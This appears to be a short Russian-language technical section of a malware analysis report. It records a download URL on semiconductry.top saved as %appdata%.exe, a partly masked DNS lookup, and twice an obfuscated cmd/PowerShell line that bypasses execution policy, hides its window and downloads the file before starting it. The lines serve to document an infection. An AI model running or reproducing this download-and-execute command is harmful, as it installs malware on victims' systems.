Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWeRSHELL.ExE -eXECUTiOnpolIcy BypASs -NOPRofilE -wINDOWSTyLe HIdDeN (NEW-OBJECt SystEm.NEt.WeBCLient).doWNLoaDfILE('http://semiconductry.top/search.php','%appDAta%.ExE');sTARt-...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /c "poWeRSHELL.ExE -eXECUTiOnpolIcy BypASs -NOPRofilE -wINDOWSTyLe HIdDeN (NEW-OBJECt SystEm.NEt.WeBCLient).doWNLoaDfILE('http://semiconductry.top/search.php','%appDAta%.ExE');sTARt-...' (со скрытым окном)